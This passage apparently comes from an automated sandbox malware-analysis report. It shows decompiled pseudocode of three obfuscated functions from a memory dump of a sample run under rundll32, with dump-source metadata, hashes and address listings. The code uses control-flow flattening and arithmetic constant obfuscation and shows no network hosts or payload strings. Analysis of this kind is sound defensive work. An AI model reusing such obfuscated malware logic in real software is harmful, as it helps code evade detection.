                                                                                                                                    				_v100 = 0x1d8880;
                                                                                                                                    				_v100 = _v100 + 0x8a1e;
                                                                                                                                    				_v100 = _v100 * 0x7c;
                                                                                                                                    				_v100 = _v100 + 0xffff421a;
                                                                                                                                    				_v100 = _v100 ^ 0x0e9f1559;
                                                                                                                                    				_v36 = 0x784079;
                                                                                                                                    				_v36 = _v36 / _t227;
                                                                                                                                    				_v36 = _v36 ^ 0x0007caf6;
                                                                                                                                    				_v60 = 0xd037f8;
                                                                                                                                    				_v60 = _v60 >> 0xf;
                                                                                                                                    				_v60 = _v60 + 0xfffff3b4;
                                                                                                                                    				_v60 = _v60 ^ 0xfff3df4e;
                                                                                                                                    				_v64 = 0x95f516;
                                                                                                                                    				_v64 = _v64 + 0xffffc55a;
                                                                                                                                    				_v64 = _v64 | 0x523f0ae6;
                                                                                                                                    				_v64 = _v64 ^ 0x52b19695;
                                                                                                                                    				_v84 = 0x271827;
                                                                                                                                    				_v84 = _v84 + 0xffff7017;
                                                                                                                                    				_v84 = _v84 + 0x1e15;
                                                                                                                                    				_v84 = _v84 ^ 0xa1c53b6b;
                                                                                                                                    				_v84 = _v84 ^ 0xa1e64a9e;
                                                                                                                                    				_v52 = 0x3d5883;
                                                                                                                                    				_v52 = _v52 >> 5;
                                                                                                                                    				_v52 = _v52 << 3;
                                                                                                                                    				_v52 = _v52 ^ 0x000b56f4;
                                                                                                                                    				_v56 = 0xd5acf2;
                                                                                                                                    				_v56 = _v56 ^ 0x15c9a5cd;
                                                                                                                                    				_v56 = _v56 << 3;
                                                                                                                                    				_v56 = _v56 ^ 0xa8e6808a;
                                                                                                                                    				_v88 = 0xcc2476;
                                                                                                                                    				_v88 = _v88 + 0x4ceb;
                                                                                                                                    				_v88 = _v88 ^ 0xdbab884b;
                                                                                                                                    				_t228 = 0x4f;
                                                                                                                                    				_v88 = _v88 / _t228;
                                                                                                                                    				_v88 = _v88 ^ 0x02ce2d39;
                                                                                                                                    				_v20 = 0x9b21e;
                                                                                                                                    				_v20 = _v20 + 0x218b;
                                                                                                                                    				_v20 = _v20 ^ 0x00037084;
                                                                                                                                    				_v76 = 0xcba48;
                                                                                                                                    				_t229 = 0x5a;
                                                                                                                                    				_t222 = _v12;
                                                                                                                                    				_v76 = _v76 * 0x7b;
                                                                                                                                    				_v76 = _v76 + 0x3acc;
                                                                                                                                    				_v76 = _v76 << 0x10;
                                                                                                                                    				_v76 = _v76 ^ 0xbb6cb0a9;
                                                                                                                                    				_v80 = 0x9c886e;
                                                                                                                                    				_v80 = _v80 ^ 0x88757b42;
                                                                                                                                    				_t230 = 0x5c;
                                                                                                                                    				_v80 = _v80 / _t229;
                                                                                                                                    				_v80 = _v80 << 0xe;
                                                                                                                                    				_v80 = _v80 ^ 0x5c6ae118;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t213 = 0xa360d2e;
                                                                                                                                    					do {
                                                                                                                                    						while(_t257 != _t213) {
                                                                                                                                    							if(_t257 == 0xb87cfc3) {
                                                                                                                                    								_t223 =  *0x2e3e10; // 0x0
                                                                                                                                    								_t224 = _t223 + 0x1c;
                                                                                                                                    								while(1) {
                                                                                                                                    									__eflags =  *_t224 - _t230;
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										break;
                                                                                                                                    									}
                                                                                                                                    									_t224 = _t224 + 2;
                                                                                                                                    									__eflags = _t224;
                                                                                                                                    								}
                                                                                                                                    								_t222 = _t224 + 2;
                                                                                                                                    								_t257 = 0xc7301de;
                                                                                                                                    								goto L1;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t257 == 0xc7301de) {
                                                                                                                                    									_push(_v48);
                                                                                                                                    									_push(_v44);
                                                                                                                                    									_t216 = E002DDCF7(_v40, 0x2c1080, __eflags);
                                                                                                                                    									_pop(_t236);
                                                                                                                                    									__eflags = E002CAAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
                                                                                                                                    									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
                                                                                                                                    									E002CA8B0(_v60, _t216, _v64);
                                                                                                                                    									_t261 =  &(_t261[0xf]);
                                                                                                                                    									L14:
                                                                                                                                    									_t213 = 0xa360d2e;
                                                                                                                                    									_t230 = 0x5c;
                                                                                                                                    									goto L15;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t257 == 0xdd28c3f) {
                                                                                                                                    										E002C1FD1(_v20, _v76, _v80, _v16);
                                                                                                                                    									} else {
                                                                                                                                    										if(_t257 != 0xf52a3f4) {
                                                                                                                                    											goto L15;
                                                                                                                                    										} else {
                                                                                                                                    											_t257 = 0xb87cfc3;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L18:
                                                                                                                                    							return _v12;
                                                                                                                                    						}
                                                                                                                                    						_t214 = E002C1F53(_v16, _v84, _v52, _t222, _v56, _v88);
                                                                                                                                    						_t261 =  &(_t261[4]);
                                                                                                                                    						__eflags = _t214;
                                                                                                                                    						_t257 = 0xdd28c3f;
                                                                                                                                    						_t191 = _t214 == 0;
                                                                                                                                    						__eflags = _t191;
                                                                                                                                    						_v12 = 0 | _t191;
                                                                                                                                    						goto L14;
                                                                                                                                    						L15:
                                                                                                                                    						__eflags = _t257 - 0x57f878b;
                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                    					goto L18;
                                                                                                                                    				}
                                                                                                                                    			}


                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                                    • API String ID: 0-3177096336
                                                                                                                                    • Opcode ID: 67ffb40e9ec39d670714aad34d47944606c3437ef3baf5b068da1c4df100af23
                                                                                                                                    • Instruction ID: 30cbbc8c2702f0cd0df573ee90affbe0f533f3f4c35f327c162b502b0280baed
                                                                                                                                    • Opcode Fuzzy Hash: 67ffb40e9ec39d670714aad34d47944606c3437ef3baf5b068da1c4df100af23
                                                                                                                                    • Instruction Fuzzy Hash: 22A140B26183419FC398CF25D88A91BBBF1FBD4758F108A1DF19986260D3B18959CF87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002CB74D(void* __ecx, void* __edx) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				void* _t231;
                                                                                                                                    				intOrPtr _t232;
                                                                                                                                    				intOrPtr _t233;
                                                                                                                                    				void* _t237;
                                                                                                                                    				signed int _t239;
                                                                                                                                    				signed int _t240;
                                                                                                                                    				signed int _t241;
                                                                                                                                    				signed int _t242;
                                                                                                                                    				void* _t266;
                                                                                                                                    				void* _t267;
                                                                                                                                    				signed int* _t270;
                                                                                                                                    				signed int* _t271;
                                                                                                                                    
                                                                                                                                    				_t270 =  &_v104;
                                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                                    				_v12 = 0x6c2b32;
                                                                                                                                    				_v8 = 0x58b11;
                                                                                                                                    				_v64 = 0x37f8ee;
                                                                                                                                    				_v64 = _v64 + 0xffff6702;
                                                                                                                                    				_v64 = _v64 ^ 0xad40df3f;
                                                                                                                                    				_v64 = _v64 ^ 0xad79282c;
                                                                                                                                    				_v100 = 0x6d524;
                                                                                                                                    				_v100 = _v100 >> 0xf;
                                                                                                                                    				_v100 = _v100 + 0x2921;
                                                                                                                                    				_v100 = _v100 >> 6;
                                                                                                                                    				_v100 = _v100 ^ 0x00050ee9;
                                                                                                                                    				_v28 = 0x9e9a;
                                                                                                                                    				_t266 = __edx;
                                                                                                                                    				_t237 = __ecx;
                                                                                                                                    				_t267 = 0x52ffaa2;
                                                                                                                                    				_t239 = 0xb;
                                                                                                                                    				_v28 = _v28 / _t239;
                                                                                                                                    				_v28 = _v28 ^ 0x00028e70;
                                                                                                                                    				_v32 = 0x2476b5;
                                                                                                                                    				_t240 = 0x6f;
                                                                                                                                    				_v32 = _v32 / _t240;
                                                                                                                                    				_v32 = _v32 ^ 0x0008b44d;
                                                                                                                                    				_v60 = 0x9e7d2d;
                                                                                                                                    				_v60 = _v60 >> 0xc;
                                                                                                                                    				_v60 = _v60 << 0xe;
                                                                                                                                    				_v60 = _v60 ^ 0x02752993;
                                                                                                                                    				_v24 = 0xe09194;
                                                                                                                                    				_t241 = 0x44;
                                                                                                                                    				_v24 = _v24 / _t241;
                                                                                                                                    				_v24 = _v24 ^ 0x0009703f;
                                                                                                                                    				_v96 = 0x854eb1;
                                                                                                                                    				_v96 = _v96 + 0xc1c6;
                                                                                                                                    				_v96 = _v96 * 0x1a;
                                                                                                                                    				_v96 = _v96 | 0x594c04b7;
                                                                                                                                    				_v96 = _v96 ^ 0x5dd9e9b5;
                                                                                                                                    				_v20 = 0x86d30b;
                                                                                                                                    				_v20 = _v20 | 0xe45dff90;
                                                                                                                                    				_v20 = _v20 ^ 0xe4d4624e;
                                                                                                                                    				_v92 = 0x8501b9;
                                                                                                                                    				_v92 = _v92 >> 6;
                                                                                                                                    				_v92 = _v92 * 0x2f;
                                                                                                                                    				_v92 = _v92 + 0xe9ed;
                                                                                                                                    				_v92 = _v92 ^ 0x0060653e;
                                                                                                                                    				_v52 = 0xaa921f;
                                                                                                                                    				_v52 = _v52 ^ 0x3dfd2146;
                                                                                                                                    				_v52 = _v52 >> 1;
                                                                                                                                    				_v52 = _v52 ^ 0x1ea8ab64;
                                                                                                                                    				_v56 = 0x2765e6;
                                                                                                                                    				_v56 = _v56 ^ 0x5c8ea534;
                                                                                                                                    				_v56 = _v56 | 0xccee86e2;
                                                                                                                                    				_v56 = _v56 ^ 0xdcebf872;
                                                                                                                                    				_v88 = 0x89b797;
                                                                                                                                    				_v88 = _v88 + 0x84ba;
                                                                                                                                    				_v88 = _v88 + 0xc14;
                                                                                                                                    				_v88 = _v88 | 0xbe23ba3f;
                                                                                                                                    				_v88 = _v88 ^ 0xbea6e118;
                                                                                                                                    				_v48 = 0x866a1d;
                                                                                                                                    				_v48 = _v48 >> 9;
                                                                                                                                    				_v48 = _v48 * 0x16;
                                                                                                                                    				_v48 = _v48 ^ 0x0007ec78;
                                                                                                                                    				_v16 = 0x7d5d8a;
                                                                                                                                    				_v16 = _v16 >> 8;
                                                                                                                                    				_v16 = _v16 ^ 0x000578c4;
                                                                                                                                    				_v68 = 0x2c77b1;
                                                                                                                                    				_v68 = _v68 | 0xad369f51;
                                                                                                                                    				_v68 = _v68 << 0xd;
                                                                                                                                    				_v68 = _v68 ^ 0xdff48475;
                                                                                                                                    				_v72 = 0x3ef83;
                                                                                                                                    				_v72 = _v72 << 3;
                                                                                                                                    				_v72 = _v72 + 0xb46;
                                                                                                                                    				_v72 = _v72 ^ 0x001ba742;
                                                                                                                                    				_v76 = 0x4a0f2c;
                                                                                                                                    				_t242 = 0x6a;
                                                                                                                                    				_v76 = _v76 * 0x54;
                                                                                                                                    				_v76 = _v76 << 0xa;
                                                                                                                                    				_v76 = _v76 ^ 0x33e29f20;
                                                                                                                                    				_v36 = 0x9fb368;
                                                                                                                                    				_v36 = _v36 >> 0xb;
                                                                                                                                    				_v36 = _v36 ^ 0x000f389a;
                                                                                                                                    				_v40 = 0x5cfe3a;
                                                                                                                                    				_v40 = _v40 + 0x27ff;
                                                                                                                                    				_v40 = _v40 ^ 0x005ee30c;
                                                                                                                                    				_v104 = 0xfd26ea;
                                                                                                                                    				_v104 = _v104 << 9;
                                                                                                                                    				_v104 = _v104 + 0xffff1095;
                                                                                                                                    				_v104 = _v104 + 0xffffd24c;
                                                                                                                                    				_v104 = _v104 ^ 0xfa4b2973;
                                                                                                                                    				_v80 = 0xbb493f;
                                                                                                                                    				_v80 = _v80 + 0x4ae2;
                                                                                                                                    				_v80 = _v80 | 0xbb4dbcb8;
                                                                                                                                    				_v80 = _v80 + 0x3bc7;
                                                                                                                                    				_v80 = _v80 ^ 0xbbf0b3fa;
                                                                                                                                    				_v44 = 0xfc3c2e;
                                                                                                                                    				_v44 = _v44 << 0x10;
                                                                                                                                    				_v44 = _v44 + 0xffff4208;
                                                                                                                                    				_v44 = _v44 ^ 0x3c281d99;
                                                                                                                                    				_v84 = 0xc50344;
                                                                                                                                    				_v84 = _v84 | 0xb9ed19f4;
                                                                                                                                    				_v84 = _v84 / _t242;
                                                                                                                                    				_t243 = 0x6b;
                                                                                                                                    				_v84 = _v84 / _t243;
                                                                                                                                    				_v84 = _v84 ^ 0x000f16db;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t231 = 0xc3f018b;
                                                                                                                                    					do {
                                                                                                                                    						L2:
                                                                                                                                    						while(_t267 != 0x52ffaa2) {
                                                                                                                                    							if(_t267 == 0x865547f) {
                                                                                                                                    								_t243 = _v88;
                                                                                                                                    								_t232 = E002CCDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                    								_t270 =  &(_t270[2]);
                                                                                                                                    								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
                                                                                                                                    								__eflags = _t232;
                                                                                                                                    								_t231 = 0xc3f018b;
                                                                                                                                    								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							if(_t267 == 0xb133873) {
                                                                                                                                    								_push(_v32);
                                                                                                                                    								_t233 = E002DC3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
                                                                                                                                    								_t271 =  &(_t270[4]);
                                                                                                                                    								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
                                                                                                                                    								__eflags = _t233;
                                                                                                                                    								if(_t233 != 0) {
                                                                                                                                    									E002C7B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
                                                                                                                                    									_push( *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                    									_push(_v56);
                                                                                                                                    									_push(_v52);
                                                                                                                                    									_t243 = _v20;
                                                                                                                                    									E002C7C37(_v20, _v92);
                                                                                                                                    									_t270 =  &(_t271[6]);
                                                                                                                                    									_t267 = 0x865547f;
                                                                                                                                    									goto L1;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t267 == 0xb7a2405) {
                                                                                                                                    									return E002D9E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                    								}
                                                                                                                                    								if(_t267 != _t231) {
                                                                                                                                    									goto L13;
                                                                                                                                    								} else {
                                                                                                                                    									_t233 = E002C46BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E002C4C5D, _v104);
                                                                                                                                    									_t270 =  &(_t270[0xa]);
                                                                                                                                    									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
                                                                                                                                    									if(_t233 == 0) {
                                                                                                                                    										_t267 = 0xb7a2405;
                                                                                                                                    										while(1) {
                                                                                                                                    											L1:
                                                                                                                                    											_t231 = 0xc3f018b;
                                                                                                                                    											goto L2;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							return _t233;
                                                                                                                                    						}
                                                                                                                                    						_t267 = 0xb133873;
                                                                                                                                    						L13:
                                                                                                                                    						__eflags = _t267 - 0x1aeb2e;
                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                    					return _t231;
                                                                                                                                    				}
                                                                                                                                    			}










































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                                    • API String ID: 0-1675410552
                                                                                                                                    • Opcode ID: abd2b99392ae732305241540355a6ddc0e98a35cc94223273aedf4d18e0d5c71
                                                                                                                                    • Instruction ID: e3157e99eb15b5200b7d6bdbf16e818d3468777f6909db71f434869e664a9b99
                                                                                                                                    • Opcode Fuzzy Hash: abd2b99392ae732305241540355a6ddc0e98a35cc94223273aedf4d18e0d5c71
                                                                                                                                    • Instruction Fuzzy Hash: 13B140724083419FC359CF65C58A80BFBE2FBC5758F108A1CF58A96260D3B5CA69CF86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002CE5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				char _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				void* _t170;
                                                                                                                                    				void* _t181;
                                                                                                                                    				void* _t184;
                                                                                                                                    				void* _t189;
                                                                                                                                    				void* _t192;
                                                                                                                                    				void* _t195;
                                                                                                                                    				void* _t197;
                                                                                                                                    				void* _t220;
                                                                                                                                    				signed int _t221;
                                                                                                                                    				signed int _t222;
                                                                                                                                    				signed int _t223;
                                                                                                                                    				signed int* _t226;
                                                                                                                                    
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_t219 = _a4;
                                                                                                                                    				_t195 = __ecx;
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t170);
                                                                                                                                    				_v56 = 0xa4c651;
                                                                                                                                    				_t226 =  &(( &_v116)[4]);
                                                                                                                                    				_v56 = _v56 ^ 0x6a6d8bac;
                                                                                                                                    				_v56 = _v56 ^ 0x6ac6bd64;
                                                                                                                                    				_t220 = 0;
                                                                                                                                    				_v60 = 0xbac055;
                                                                                                                                    				_t197 = 0xf39239f;
                                                                                                                                    				_v60 = _v60 << 0xd;
                                                                                                                                    				_v60 = _v60 ^ 0x580542e6;
                                                                                                                                    				_v108 = 0xd580f5;
                                                                                                                                    				_v108 = _v108 ^ 0x97cdda0d;
                                                                                                                                    				_v108 = _v108 + 0x37dd;
                                                                                                                                    				_v108 = _v108 >> 0xe;
                                                                                                                                    				_v108 = _v108 ^ 0x00021113;
                                                                                                                                    				_v52 = 0xf28435;
                                                                                                                                    				_v52 = _v52 | 0x057a1a90;
                                                                                                                                    				_v52 = _v52 ^ 0x05fdc129;
                                                                                                                                    				_v80 = 0x5c8bc8;
                                                                                                                                    				_t221 = 0x27;
                                                                                                                                    				_v80 = _v80 / _t221;
                                                                                                                                    				_t222 = 0x1b;
                                                                                                                                    				_v80 = _v80 * 9;
                                                                                                                                    				_v80 = _v80 ^ 0x0013f028;
                                                                                                                                    				_v96 = 0x281d9a;
                                                                                                                                    				_v96 = _v96 + 0xffff8f77;
                                                                                                                                    				_v96 = _v96 + 0x4719;
                                                                                                                                    				_v96 = _v96 << 0xf;
                                                                                                                                    				_v96 = _v96 ^ 0xfa152b1c;
                                                                                                                                    				_v112 = 0x7415d8;
                                                                                                                                    				_v112 = _v112 >> 0xf;
                                                                                                                                    				_v112 = _v112 + 0xfffff76c;
                                                                                                                                    				_v112 = _v112 >> 0xd;
                                                                                                                                    				_v112 = _v112 ^ 0x000d779a;
                                                                                                                                    				_v88 = 0xb68707;
                                                                                                                                    				_v88 = _v88 ^ 0x45e0ecf4;
                                                                                                                                    				_v88 = _v88 + 0xffff71c0;
                                                                                                                                    				_v88 = _v88 ^ 0x455519c2;
                                                                                                                                    				_v116 = 0xceabf6;
                                                                                                                                    				_v116 = _v116 + 0x1225;
                                                                                                                                    				_v116 = _v116 / _t222;
                                                                                                                                    				_v116 = _v116 >> 6;
                                                                                                                                    				_v116 = _v116 ^ 0x0006e3bb;
                                                                                                                                    				_v84 = 0xd525a4;
                                                                                                                                    				_v84 = _v84 + 0xffff1243;
                                                                                                                                    				_v84 = _v84 + 0x1c30;
                                                                                                                                    				_v84 = _v84 ^ 0x00df7efc;
                                                                                                                                    				_v100 = 0xf29ecf;
                                                                                                                                    				_v100 = _v100 << 0xc;
                                                                                                                                    				_v100 = _v100 + 0xffff4e95;
                                                                                                                                    				_v100 = _v100 ^ 0x70d6065d;
                                                                                                                                    				_v100 = _v100 ^ 0x593d89f0;
                                                                                                                                    				_v104 = 0x2206c6;
                                                                                                                                    				_v104 = _v104 | 0x38687435;
                                                                                                                                    				_v104 = _v104 ^ 0xadcf411b;
                                                                                                                                    				_v104 = _v104 ^ 0x9549ac77;
                                                                                                                                    				_v104 = _v104 ^ 0x00e3f730;
                                                                                                                                    				_v92 = 0xd38a43;
                                                                                                                                    				_v92 = _v92 >> 3;
                                                                                                                                    				_v92 = _v92 + 0x6fd1;
                                                                                                                                    				_v92 = _v92 ^ 0x0012c73c;
                                                                                                                                    				_v64 = 0x625266;
                                                                                                                                    				_v64 = _v64 + 0x2436;
                                                                                                                                    				_v64 = _v64 ^ 0x006987c3;
                                                                                                                                    				_v68 = 0xe296bd;
                                                                                                                                    				_v68 = _v68 << 0xd;
                                                                                                                                    				_v68 = _v68 ^ 0x52d9a139;
                                                                                                                                    				_v72 = 0x54a2fd;
                                                                                                                                    				_v72 = _v72 << 0xd;
                                                                                                                                    				_v72 = _v72 >> 0xa;
                                                                                                                                    				_v72 = _v72 ^ 0x002b3e4c;
                                                                                                                                    				_v76 = 0x32cdcd;
                                                                                                                                    				_v76 = _v76 << 0xb;
                                                                                                                                    				_t223 = 0x32;
                                                                                                                                    				_v76 = _v76 / _t223;
                                                                                                                                    				_v76 = _v76 ^ 0x0302c408;
                                                                                                                                    				_v48 = 0x2d2164;
                                                                                                                                    				_v48 = _v48 + 0xfffff0e0;
                                                                                                                                    				_v48 = _v48 ^ 0x0021ab5a;
                                                                                                                                    				do {
                                                                                                                                    					while(_t197 != 0x2168849) {
                                                                                                                                    						if(_t197 == 0x29fa3de) {
                                                                                                                                    							_t184 = E002C2A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
                                                                                                                                    							_t226 =  &(_t226[3]);
                                                                                                                                    							__eflags = _t184;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								_t197 = 0x74ac459;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t197 == 0x545de14) {
                                                                                                                                    								E002C3DBC( &_v44, _t195, _v56, _v60, _v108);
                                                                                                                                    								_t226 =  &(_t226[3]);
                                                                                                                                    								_t197 = 0x2168849;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t197 == 0x6ab10c5) {
                                                                                                                                    									_t189 = E002C2A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
                                                                                                                                    									_t226 =  &(_t226[3]);
                                                                                                                                    									__eflags = _t189;
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										_t197 = 0x29fa3de;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									if(_t197 == 0x74ac459) {
                                                                                                                                    										_t192 = E002C2A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
                                                                                                                                    										_t226 =  &(_t226[3]);
                                                                                                                                    										__eflags = _t192;
                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                    											_t197 = 0x9dbfb8a;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										if(_t197 == 0x9dbfb8a) {
                                                                                                                                    											__eflags = E002DD97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
                                                                                                                                    											_t220 =  !=  ? 1 : _t220;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t197 != 0xf39239f) {
                                                                                                                                    												goto L19;
                                                                                                                                    											} else {
                                                                                                                                    												_t197 = 0x545de14;
                                                                                                                                    												continue;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L22:
                                                                                                                                    						return _t220;
                                                                                                                                    					}
                                                                                                                                    					_t181 = E002C2A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
                                                                                                                                    					_t226 =  &(_t226[3]);
                                                                                                                                    					__eflags = _t181;
                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                    						_t197 = 0x90a774d;
                                                                                                                                    						goto L19;
                                                                                                                                    					} else {
                                                                                                                                    						_t197 = 0x6ab10c5;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L22;
                                                                                                                                    					L19:
                                                                                                                                    					__eflags = _t197 - 0x90a774d;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L22;
                                                                                                                                    			}


































                                                                                                                                    0x002ce80f
                                                                                                                                    0x002ce817
                                                                                                                                    0x002ce81f
                                                                                                                                    0x002ce827
                                                                                                                                    0x002ce82f
                                                                                                                                    0x002ce82f
                                                                                                                                    0x002ce83d
                                                                                                                                    0x002ce90f
                                                                                                                                    0x002ce914
                                                                                                                                    0x002ce917
                                                                                                                                    0x002ce919
                                                                                                                                    0x002ce91b
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce91b
                                                                                                                                    0x002ce843
                                                                                                                                    0x002ce849
                                                                                                                                    0x002ce8e8
                                                                                                                                    0x002ce8ed
                                                                                                                                    0x002ce8f0
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce84f
                                                                                                                                    0x002ce855
                                                                                                                                    0x002ce8bf
                                                                                                                                    0x002ce8c4
                                                                                                                                    0x002ce8c7
                                                                                                                                    0x002ce8c9
                                                                                                                                    0x002ce8cf
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce8cf
                                                                                                                                    0x002ce857
                                                                                                                                    0x002ce85d
                                                                                                                                    0x002ce893
                                                                                                                                    0x002ce898
                                                                                                                                    0x002ce89b
                                                                                                                                    0x002ce89d
                                                                                                                                    0x002ce8a3
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce8a3
                                                                                                                                    0x002ce85f
                                                                                                                                    0x002ce865
                                                                                                                                    0x002ce982
                                                                                                                                    0x002ce984
                                                                                                                                    0x002ce86b
                                                                                                                                    0x002ce871
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce877
                                                                                                                                    0x002ce877
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce877
                                                                                                                                    0x002ce871
                                                                                                                                    0x002ce865
                                                                                                                                    0x002ce85d
                                                                                                                                    0x002ce855
                                                                                                                                    0x002ce849
                                                                                                                                    0x002ce988
                                                                                                                                    0x002ce990
                                                                                                                                    0x002ce990
                                                                                                                                    0x002ce93a
                                                                                                                                    0x002ce93f
                                                                                                                                    0x002ce942
                                                                                                                                    0x002ce944
                                                                                                                                    0x002ce950
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce946
                                                                                                                                    0x002ce946
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce946
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce955
                                                                                                                                    0x002ce955
                                                                                                                                    0x002ce955
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
